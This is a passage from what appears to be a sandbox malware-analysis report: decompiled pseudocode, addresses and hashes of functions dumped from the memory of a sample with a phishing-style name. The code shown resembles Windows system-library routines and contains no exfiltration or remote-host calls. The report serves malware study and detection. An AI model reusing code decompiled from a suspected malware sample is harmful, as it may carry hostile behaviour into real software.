				void* _t105;
				signed int _t107;
				void* _t108;
				intOrPtr* _t111;
				intOrPtr* _t112;
				void* _t116;
				intOrPtr _t117;
				intOrPtr* _t118;
				signed int _t119;

				_t118 = __edx;
				_t116 = 0;
				_v28 = __ecx;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v24 = 0;
				if(__ecx == 0 || __edx == 0 || _a12 == 0) {
					return 0xc000000d;
				} else {
					if(E3335B920(__ecx, __ecx & 0xfffffffc) == 0) {
						_t119 = 0xc000007b;
						L27:
						if(_v8 != 0) {
							_push(_v8);
							E33392A80();
							_v8 = _t116;
						}
						if(_v16 != 0) {
							_push(_v16);
							_push(0xffffffff);
							E33392C50();
						}
						L25:
						return _t119;
					}
					_t107 = 6;
					asm("sbb ebx, ebx");
					_t108 = 2;
					_t105 = (_t103 & _t107) + _t108;
					if(_a4 != 0) {
						_v36 =  *__edx;
						_t51 = _t118 + 4; // 0x9da8c2d7
						_v32 =  *_t51;
						_v20 = 0;
						_v84 = 0x18;
						L33:
						_v80 = _v80 & 0x00000000;
						L10:
						_v68 = _v68 & 0x00000000;
						_v64 = _v64 & 0x00000000;
						_t109 =  &_v8;
						_v72 = 0x40;
						_v76 =  &_v36;
						_t78 = E3335929A( &_v8,  &_v84, _v28);
						_t119 = _t78;
						if(_t116 == 0) {
							_t116 = 0;
							L14:
							if(_t119 < 0) {
								goto L27;
							}
							_push(_v8);
							_push(0x8000000);
							_push(_t105);
							_push(_t116);
							_push(_t116);
							_push(0xf0005);
							_push( &_v12);
							_t119 = E33392E50();
							if(_t119 < 0) {
								goto L27;
							}
							_push(_t105);
							_push(_t116);
							_push("true");
							_v44 = _t116;
							_push( &_v24);
							_v40 = _t116;
							_push( &_v44);
							_push(_t116);
							_push(_t116);
							_push( &_v16);
							_push(0xffffffff);
							_push(_v12);
							_t119 = E33392C30();
							if(_v12 != 0) {
								_push(_v12);
								E33392A80();
								_v12 = _t116;
							}
							if(_t119 < 0) {
								goto L27;
							} else {
								if(E3335B920(_t109, _v16) == 0) {
									_t119 = 0xc000007b;
								}
								if(_t119 < 0) {
									goto L27;
								} else {
									 *_a12 = _v16;
									_t111 = _a16;
									if(_t111 != 0) {
										 *_t111 = _v24;
									}
									_t112 = _a8;
									if(_t112 == 0) {
										if(_v8 != 0) {
											_push(_v8);
											E33392A80();
										}
									} else {
										 *_t112 = _v8;
									}
									goto L25;
								}
							}
						}
						_t117 = _v48;
						if(_t117 != 0) {
							asm("lock xadd [edi], eax");
							if((_t78 | 0xffffffff) != 0) {
								goto L12;
							}
							_push( *((intOrPtr*)(_t117 + 4)));
							E33392A80();
							_t116 = 0;
							E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t117);
							L13:
							E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t116, _v20);
							goto L14;
						}
						L12:
						_t116 = 0;
						goto L13;
					}
					_t9 = _t118 + 4; // 0x9da8c2d7
					_t119 = L33371C48(_t108,  *_t9,  &_v36, 0,  &_v60);
					if(_t119 < 0) {
						goto L27;
					}
					_t100 = _v60;
					_t116 = _v32;
					_v20 = _t116;
					if(_t100 != 0) {
						_v36 = _t100;
						_v32 = _v56;
						_t102 = _v52;
					} else {
						_t102 = 0;
					}
					_v84 = 0x18;
					if(_t116 == 0) {
						goto L33;
					} else {
						_v80 = _t102;
						goto L10;
					}
				}
			}




































                                                                                                                                                                                  0x33359666
                                                                                                                                                                                  0x33359669
                                                                                                                                                                                  0x3335966b
                                                                                                                                                                                  0x3335966e
                                                                                                                                                                                  0x33359671
                                                                                                                                                                                  0x33359674
                                                                                                                                                                                  0x33359677
                                                                                                                                                                                  0x3335967c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33359693
                                                                                                                                                                                  0x3335969e
                                                                                                                                                                                  0x333b2696
                                                                                                                                                                                  0x333597e8
                                                                                                                                                                                  0x333597ec
                                                                                                                                                                                  0x333b2719
                                                                                                                                                                                  0x333b271c
                                                                                                                                                                                  0x333b2721
                                                                                                                                                                                  0x333b2721
                                                                                                                                                                                  0x333597f6
                                                                                                                                                                                  0x333b2729
                                                                                                                                                                                  0x333b272c
                                                                                                                                                                                  0x333b272e
                                                                                                                                                                                  0x333b272e
                                                                                                                                                                                  0x333597df
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333597df
                                                                                                                                                                                  0x333596a6
                                                                                                                                                                                  0x333596ad
                                                                                                                                                                                  0x333596b1
                                                                                                                                                                                  0x333596b2
                                                                                                                                                                                  0x333596b8
                                                                                                                                                                                  0x333b26a2
                                                                                                                                                                                  0x333b26a5
                                                                                                                                                                                  0x333b26a8
                                                                                                                                                                                  0x333b26ab
                                                                                                                                                                                  0x333b26ae
                                                                                                                                                                                  0x333b26b5
                                                                                                                                                                                  0x333b26b5
                                                                                                                                                                                  0x333596ff
                                                                                                                                                                                  0x33359702
                                                                                                                                                                                  0x33359709
                                                                                                                                                                                  0x33359710
                                                                                                                                                                                  0x33359713
                                                                                                                                                                                  0x3335971a
                                                                                                                                                                                  0x3335971d
                                                                                                                                                                                  0x33359722
                                                                                                                                                                                  0x33359726
                                                                                                                                                                                  0x333b26fb
                                                                                                                                                                                  0x3335974b
                                                                                                                                                                                  0x3335974d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33359753
                                                                                                                                                                                  0x33359759
                                                                                                                                                                                  0x3335975e
                                                                                                                                                                                  0x3335975f
                                                                                                                                                                                  0x33359760
                                                                                                                                                                                  0x33359761
                                                                                                                                                                                  0x33359766
                                                                                                                                                                                  0x3335976c
                                                                                                                                                                                  0x33359770
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33359772
                                                                                                                                                                                  0x33359773
                                                                                                                                                                                  0x33359774
                                                                                                                                                                                  0x33359779
                                                                                                                                                                                  0x3335977c
                                                                                                                                                                                  0x33359780
                                                                                                                                                                                  0x33359783
                                                                                                                                                                                  0x33359784
                                                                                                                                                                                  0x33359785
                                                                                                                                                                                  0x33359789
                                                                                                                                                                                  0x3335978a
                                                                                                                                                                                  0x3335978c
                                                                                                                                                                                  0x33359798
                                                                                                                                                                                  0x3335979a
                                                                                                                                                                                  0x3335979c
                                                                                                                                                                                  0x3335979f
                                                                                                                                                                                  0x333597a4
                                                                                                                                                                                  0x333597a4
                                                                                                                                                                                  0x333597a9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333597ab
                                                                                                                                                                                  0x333597b5
                                                                                                                                                                                  0x333597fd
                                                                                                                                                                                  0x333597fd
                                                                                                                                                                                  0x333597b9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333597bb
                                                                                                                                                                                  0x333597c1
                                                                                                                                                                                  0x333597c3
                                                                                                                                                                                  0x333597c8
                                                                                                                                                                                  0x333597cd
                                                                                                                                                                                  0x333597cd
                                                                                                                                                                                  0x333597cf
                                                                                                                                                                                  0x333597d4
                                                                                                                                                                                  0x333b2706
                                                                                                                                                                                  0x333b270c
                                                                                                                                                                                  0x333b270f
                                                                                                                                                                                  0x333b270f
                                                                                                                                                                                  0x333597da
                                                                                                                                                                                  0x333597dd
                                                                                                                                                                                  0x333597dd
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333597d4
                                                                                                                                                                                  0x333597b9
                                                                                                                                                                                  0x333597a9
                                                                                                                                                                                  0x3335972c
                                                                                                                                                                                  0x33359731
                                                                                                                                                                                  0x333b26d2
                                                                                                                                                                                  0x333b26d6
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b26dc
                                                                                                                                                                                  0x333b26df
                                                                                                                                                                                  0x333b26eb
                                                                                                                                                                                  0x333b26f1
                                                                                                                                                                                  0x33359739
                                                                                                                                                                                  0x33359746
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33359746
                                                                                                                                                                                  0x33359737
                                                                                                                                                                                  0x33359737
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33359737
                                                                                                                                                                                  0x333596be
                                                                                                                                                                                  0x333596cf
                                                                                                                                                                                  0x333596d3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333596d9
                                                                                                                                                                                  0x333596dc
                                                                                                                                                                                  0x333596df
                                                                                                                                                                                  0x333596e5
                                                                                                                                                                                  0x333b26be
                                                                                                                                                                                  0x333b26c4
                                                                                                                                                                                  0x333b26c7
                                                                                                                                                                                  0x333596eb
                                                                                                                                                                                  0x333596eb
                                                                                                                                                                                  0x333596eb
                                                                                                                                                                                  0x333596ed
                                                                                                                                                                                  0x333596f6
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333596fc
                                                                                                                                                                                  0x333596fc
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333596fc
                                                                                                                                                                                  0x333596f6

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                  • API String ID: 0-2766056989
                                                                                                                                                                                  • Opcode ID: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                                                                                                                                                  • Instruction ID: aa58316a27ac2ea061af9739ae112ad174f7a0b2f35394a641344894def93283
                                                                                                                                                                                  • Opcode Fuzzy Hash: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                                                                                                                                                  • Instruction Fuzzy Hash: E76116B5D05319AFEF118FA5C880FDEBBB9AF84754F14825AF810A7650DB749A01CBA0
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 333602F9 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                                                                  			E333602F9(void* __ecx, signed char* __edx, signed char* _a4, signed short* _a8) {
				signed int _v8;
				char _v20;
				char _v24;
				signed char* _v28;
				signed short* _v32;
				void* _v36;
				signed char* _v40;
				char _v44;
				intOrPtr _v48;
				signed short _v56;
				signed short _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t73;
				signed char* _t76;
				signed char* _t78;
				intOrPtr _t93;
				void* _t124;
				signed short* _t125;
				signed char* _t131;
				signed char* _t150;
				void* _t153;
				void* _t154;
				signed int _t156;

				_t142 = __edx;
				_t126 = __ecx;
				_v8 =  *0x3344b370 ^ _t156;
				_v40 = _a4;
				_t124 = __ecx;
				_v28 = __edx;
				_v32 = _a8;
				_t73 = L33363C40();
				_t150 = 0x7ffe0384;
				if(_t73 != 0) {
					_t76 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t76 = 0x7ffe0384;
				}
				_t152 = 0x7ffe0385;
				if( *_t76 != 0) {
					if(L33363C40() == 0) {
						_t78 = 0x7ffe0385;
					} else {
						_t78 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t78 & 0x00000010) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(L33363C40() != 0) {
						_t96 = ( *[fs:0x30])[0x50] + 0x22a;
					} else {
						_t96 = _t150;
					}
					if( *_t96 != 0) {
						_t96 =  *[fs:0x30];
						if((( *[fs:0x30])[0x240] & 0x00000004) == 0) {
							goto L6;
						}
						if(L33363C40() != 0) {
							_t96 =  *[fs:0x30];
							_t152 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t152 & 0x00000020) != 0) {
							L18:
							_t152 = _v28;
							_v36 =  *((intOrPtr*)(_t124 + 0x18)) + _v28[4];
							E33394FD0(_t126,  &_v56,  *((intOrPtr*)(_t124 + 0x18)) + _v28[4]);
							_t127 = _t124;
							E333CF899(_t124, _v28, _v32,  &_v36,  &_v44);
							_t86 = _v36;
							if(_v36 == 0) {
								E3339FF70( &_v20, 0xc, "#%u", _v44);
								_t86 =  &_v20;
							}
							E33394FD0(_t127,  &_v64, _t86);
							_t142 = _v40;
							_t125 = _t124 + 0x24;
							_v32 = _t125;
							_t131 = (_v40[0x24] & 0x0000ffff) + 8 + ((_v64 & 0x0000ffff) + (_v56 & 0x0000ffff)) * 2 + ( *_t125 & 0x0000ffff);
							_t93 =  *0x33445d78; // 0x0
							_v28 = _t131;
							_v48 = _t131 + 0x24;
							_t124 = L33365D90(_t131 + 0x24, ( *[fs:0x30])[0x18], _t93 + 0x180000, _t131 + 0x24);
							if(_t124 != 0) {
								_t43 = _t124 + 0x24; // 0x24
								_t153 = _t43;
								 *((short*)(_t124 + 6)) = 0x14d6;
								 *((intOrPtr*)(_t124 + 0x20)) = 3;
								E333CFD65(_v32, _t153, _v28,  &_v24);
								_t154 = _t153 + _v24;
								_v28 = _v28 - _v24;
								E333CFD65( &(_v40[0x24]), _t154, _v28 - _v24,  &_v24);
								_t152 = _t154 + _v24;
								_v28 = _v28 - _v24;
								E333CFD20( &_v56, _t152, _v28 - _v24,  &_v24);
								_t142 = _v24 + _t152;
								E333CFD20( &_v64, _v24 + _t152, _v28 - _v24,  &_v24);
								if(L33363C40() != 0) {
									_t150 = ( *[fs:0x30])[0x50] + 0x22a;
								}
								_push(_t124);
								_push(_v48 + 0xffffffe0);
								_push(0x402);
								_push( *_t150 & 0x000000ff);
								E33392F90();
								_t96 = E33363BC0(( *[fs:0x30])[0x18], 0, _t124);
							}
						}
						goto L6;
					} else {
						L6:
						return E33394B50(_t96, _t124, _v8 ^ _t156, _t142, _t150, _t152);
					}
				}
			}




























                                                                                                                                                                                  0x333602f9
                                                                                                                                                                                  0x333602f9
                                                                                                                                                                                  0x33360308
                                                                                                                                                                                  0x33360310
                                                                                                                                                                                  0x33360313
                                                                                                                                                                                  0x33360319
                                                                                                                                                                                  0x3336031c
                                                                                                                                                                                  0x3336031f
                                                                                                                                                                                  0x33360324
                                                                                                                                                                                  0x3336032b
                                                                                                                                                                                  0x333b4ae2
                                                                                                                                                                                  0x33360331
                                                                                                                                                                                  0x33360331
                                                                                                                                                                                  0x33360331
                                                                                                                                                                                  0x33360336
                                                                                                                                                                                  0x3336033b
                                                                                                                                                                                  0x333b4af3
                                                                                                                                                                                  0x333b4b05
                                                                                                                                                                                  0x333b4af5
                                                                                                                                                                                  0x333b4afe
                                                                                                                                                                                  0x333b4afe
                                                                                                                                                                                  0x333b4b0a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b4b0c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b4b0c
                                                                                                                                                                                  0x33360341
                                                                                                                                                                                  0x33360341
                                                                                                                                                                                  0x33360348
                                                                                                                                                                                  0x333b4b1a
                                                                                                                                                                                  0x3336034e
                                                                                                                                                                                  0x3336034e
                                                                                                                                                                                  0x3336034e
                                                                                                                                                                                  0x33360353
                                                                                                                                                                                  0x333b4b24
                                                                                                                                                                                  0x333b4b31
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b4b3e
                                                                                                                                                                                  0x333b4b40
                                                                                                                                                                                  0x333b4b49
                                                                                                                                                                                  0x333b4b49
                                                                                                                                                                                  0x333b4b52
                                                                                                                                                                                  0x333b4b58
                                                                                                                                                                                  0x333b4b58
                                                                                                                                                                                  0x333b4b62
                                                                                                                                                                                  0x333b4b69
                                                                                                                                                                                  0x333b4b77
                                                                                                                                                                                  0x333b4b7d
                                                                                                                                                                                  0x333b4b82
                                                                                                                                                                                  0x333b4b87
                                                                                                                                                                                  0x333b4b97
                                                                                                                                                                                  0x333b4b9f
                                                                                                                                                                                  0x333b4b9f
                                                                                                                                                                                  0x333b4ba7
                                                                                                                                                                                  0x333b4bac
                                                                                                                                                                                  0x333b4baf
                                                                                                                                                                                  0x333b4bbc
                                                                                                                                                                                  0x333b4bcc
                                                                                                                                                                                  0x333b4bce
                                                                                                                                                                                  0x333b4bd3
                                                                                                                                                                                  0x333b4be6
                                                                                                                                                                                  0x333b4bf1
                                                                                                                                                                                  0x333b4bf5
                                                                                                                                                                                  0x333b4bfe
                                                                                                                                                                                  0x333b4bfe
                                                                                                                                                                                  0x333b4c09
                                                                                                                                                                                  0x333b4c14
                                                                                                                                                                                  0x333b4c1b
                                                                                                                                                                                  0x333b4c29
                                                                                                                                                                                  0x333b4c33
                                                                                                                                                                                  0x333b4c39
                                                                                                                                                                                  0x333b4c47
                                                                                                                                                                                  0x333b4c4e
                                                                                                                                                                                  0x333b4c54
                                                                                                                                                                                  0x333b4c69
                                                                                                                                                                                  0x333b4c6c
                                                                                                                                                                                  0x333b4c78
                                                                                                                                                                                  0x333b4c83
                                                                                                                                                                                  0x333b4c83
                                                                                                                                                                                  0x333b4c8c
                                                                                                                                                                                  0x333b4c90
                                                                                                                                                                                  0x333b4c94
                                                                                                                                                                                  0x333b4c99
                                                                                                                                                                                  0x333b4c9a
                                                                                                                                                                                  0x333b4cab
                                                                                                                                                                                  0x333b4cab
                                                                                                                                                                                  0x333b4bf5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33360359
                                                                                                                                                                                  0x33360359
                                                                                                                                                                                  0x33360367
                                                                                                                                                                                  0x33360367
                                                                                                                                                                                  0x33360353

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: #%u
                                                                                                                                                                                  • API String ID: 0-232158463
                                                                                                                                                                                  • Opcode ID: fb09552fdda980a964afd455921a7bcc88acd9df6abaddb7c7b72e4b5ce2d280
                                                                                                                                                                                  • Instruction ID: 2ce3939cff9227d569dabc6a1f369de334c00dd97f21f2fbf6806b86a72344ac
                                                                                                                                                                                  • Opcode Fuzzy Hash: fb09552fdda980a964afd455921a7bcc88acd9df6abaddb7c7b72e4b5ce2d280
                                                                                                                                                                                  • Instruction Fuzzy Hash: 087139B1E002499FDB05CFA8C985BAEB7F8FF08748F148165E901E7655EB34E941CB64
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 334186A8 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 73%
                                                                                                                                                                                  			E334186A8(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				void* _t69;
				signed int _t73;
				signed char _t86;
				signed int _t89;

				_t74 = __edx;
				_push(__ecx);
				_t86 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0xb0));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t89 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E33419BB8(_t57, _t86, _t74, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E33418565(_t86, _t74, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t73 = _t89;
					} else {
						_t73 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t73;
					_t62 = _a8;
					L11:
					_t74 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t86 + 0x10)) == _t89) {
						L19:
						if(( *(_t86 + 0xc) & 0x10000000) == 0) {
							L22:
							_t75 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t89 - 2;
								if(_t89 != 2) {
									_t33 = _t89 + 2; // 0x2
									__eflags = (_t33 << 7) + _t86;
									_t89 = E3341BA66((_t33 << 7) + _t86, _t75, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E3341A553(_t86, _v8, _t57);
								asm("sbb esi, esi");
								_t89 =  ~_t89;
								_t41 = L33363C40();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t89;
										if(_t89 != 0) {
											E3340F247(_t86, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E3341DE9F(_t57, 0x33446dc8, (_t75 -  *0x33446dc4 >> 0x14) + (_t75 -  *0x33446dc4 >> 0x14), _t86, _t89, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t75 = _v12;
							_t27 = _t47 - 1; // -1
							_t89 = _t27;
							goto L25;
						}
						_t62 = _t86;
						if(E33419B4D(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t89);
						_push(_t89);
						_push(_t89);
						_t24 =  &_v8; // 0x33446830
						_push( *_t24);
						_t69 = 9;
						E33415FED(_t69, _t86);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E333F78DE(_t62, _t86, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t89;
							}
							goto L19;
						}
						_t62 = _t86;
						_t36 = E33418565(_t62, _t74, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}






















                                                                                                                                                                                  0x334186a8
                                                                                                                                                                                  0x334186b0
                                                                                                                                                                                  0x334186b7
                                                                                                                                                                                  0x334186b9
                                                                                                                                                                                  0x334186c0
                                                                                                                                                                                  0x334186cb
                                                                                                                                                                                  0x334186cf
                                                                                                                                                                                  0x334186dc
                                                                                                                                                                                  0x334186dc
                                                                                                                                                                                  0x334186df
                                                                                                                                                                                  0x334186e1
                                                                                                                                                                                  0x334186e3
                                                                                                                                                                                  0x334186e6
                                                                                                                                                                                  0x3341870f
                                                                                                                                                                                  0x33418712
                                                                                                                                                                                  0x33418714
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3341871a
                                                                                                                                                                                  0x3341871f
                                                                                                                                                                                  0x33418722
                                                                                                                                                                                  0x33418724
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x334186e8
                                                                                                                                                                                  0x334186ef
                                                                                                                                                                                  0x334186f6
                                                                                                                                                                                  0x33418702
                                                                                                                                                                                  0x334186fd
                                                                                                                                                                                  0x334186fd
                                                                                                                                                                                  0x334186fd
                                                                                                                                                                                  0x33418707
                                                                                                                                                                                  0x3341870a
                                                                                                                                                                                  0x33418726
                                                                                                                                                                                  0x33418726
                                                                                                                                                                                  0x3341872a
                                                                                                                                                                                  0x33418730
                                                                                                                                                                                  0x33418774
                                                                                                                                                                                  0x3341877b
                                                                                                                                                                                  0x334187a4
                                                                                                                                                                                  0x334187a4
                                                                                                                                                                                  0x334187a8
                                                                                                                                                                                  0x334187ab
                                                                                                                                                                                  0x334187ce
                                                                                                                                                                                  0x334187ce
                                                                                                                                                                                  0x334187d1
                                                                                                                                                                                  0x3341882a
                                                                                                                                                                                  0x33418831
                                                                                                                                                                                  0x33418838
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33418838
                                                                                                                                                                                  0x334187d3
                                                                                                                                                                                  0x334187d4
                                                                                                                                                                                  0x334187dc
                                                                                                                                                                                  0x334187e3
                                                                                                                                                                                  0x334187e5
                                                                                                                                                                                  0x334187e7
                                                                                                                                                                                  0x334187ec
                                                                                                                                                                                  0x334187ee
                                                                                                                                                                                  0x33418800
                                                                                                                                                                                  0x334187f0
                                                                                                                                                                                  0x334187f9
                                                                                                                                                                                  0x334187f9
                                                                                                                                                                                  0x33418805
                                                                                                                                                                                  0x33418808
                                                                                                                                                                                  0x3341880a
                                                                                                                                                                                  0x33418810
                                                                                                                                                                                  0x33418817
                                                                                                                                                                                  0x33418819
                                                                                                                                                                                  0x3341881b
                                                                                                                                                                                  0x33418823
                                                                                                                                                                                  0x33418823
                                                                                                                                                                                  0x3341881b
                                                                                                                                                                                  0x33418817
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33418808
                                                                                                                                                                                  0x334187b6
                                                                                                                                                                                  0x334187be
                                                                                                                                                                                  0x334187c3
                                                                                                                                                                                  0x334187c5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x334187c7
                                                                                                                                                                                  0x334187cb
                                                                                                                                                                                  0x334187cb
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x334187cb
                                                                                                                                                                                  0x33418781
                                                                                                                                                                                  0x3341878c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3341878e
                                                                                                                                                                                  0x3341878f
                                                                                                                                                                                  0x33418790
                                                                                                                                                                                  0x33418791
                                                                                                                                                                                  0x33418791
                                                                                                                                                                                  0x33418799
                                                                                                                                                                                  0x3341879a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33418737
                                                                                                                                                                                  0x33418737
                                                                                                                                                                                  0x33418739
                                                                                                                                                                                  0x33418748
                                                                                                                                                                                  0x3341874b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3341874d
                                                                                                                                                                                  0x33418753
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33418762
                                                                                                                                                                                  0x3341876e
                                                                                                                                                                                  0x3341883a
                                                                                                                                                                                  0x33418842
                                                                                                                                                                                  0x33418842
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3341876e
                                                                                                                                                                                  0x3341873d
                                                                                                                                                                                  0x3341873f
                                                                                                                                                                                  0x33418746
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33418746
                                                                                                                                                                                  0x33418730

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 0hD3
                                                                                                                                                                                  • API String ID: 0-3161347634
                                                                                                                                                                                  • Opcode ID: d0b872585a9b1c31c22811e28930a5f1c6cb0f8d6b2485d7f1eaffdd848e79ad
                                                                                                                                                                                  • Instruction ID: db98da93f95f5fc093288b9809929ebb7c1b1e6b8a06d20aa2f61b5032a6d3eb
                                                                                                                                                                                  • Opcode Fuzzy Hash: d0b872585a9b1c31c22811e28930a5f1c6cb0f8d6b2485d7f1eaffdd848e79ad
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4841F776F00F109FD715CB29CC90B6BB79AEF807A1F448219F82587790DB78D821C699
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3336E547 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                                                                  			E3336E547(unsigned int __ecx, void* __edx, void* __eflags) {
				char _v24;
				char _v32;
				unsigned int _v36;
				short _v38;
				char _v40;
				signed int _v44;
				intOrPtr _v48;
				signed short _v50;
				unsigned int _v52;
				char _v56;
